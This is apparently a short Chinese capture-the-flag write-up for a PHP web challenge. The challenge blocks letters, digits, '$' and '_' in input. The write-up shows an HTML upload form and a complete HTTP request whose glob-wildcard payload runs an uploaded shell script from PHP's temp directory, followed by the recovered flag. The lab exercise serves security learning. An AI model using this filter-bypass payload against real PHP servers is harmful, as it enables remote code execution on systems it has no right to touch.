Web-26-1|这是...Webshell?_revenge
📖 阅读信息
阅读时间:1 分钟 | 中文字符:121 | 有效代码行数:32
碎碎念
无数字字母 RCE 2.0
Writeup
这下把美元符和下划线给 ban 掉了,还限制了长度,根据教程的做法,我们可以向 php 文件 POST 一个 shell 文件,保存到临时目录下,用 . filename 的方式执行,首先编写 html 文件上传代码,利用 Apache 搭建网站。从而模拟上传文件,以获得请求标准格式和特有标记:
| <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form action="http://ip:port/" method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" name="submit">
</form>
</body>
</html>
|
然后将其应用到我们的靶机上,添加通配符,payload 如下:
| POST /index.php?shell=?><?=`.+/???/????????[@-[]`;?> HTTP/1.1
Host: 127.0.0.1
Content-Length: 199
Cache-Control: max-age=0
Origin: http://127.0.0.1:55013
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7YheBTd5DdLj9Zrj
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
------WebKitFormBoundary7YheBTd5DdLj9Zrj
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
#! /bin/bash
env
------WebKitFormBoundary7YheBTd5DdLj9Zrj--
|
得到 flag:moectf{f140345d-f997-e7e4-02fa-e9008165c58f}
💬 评论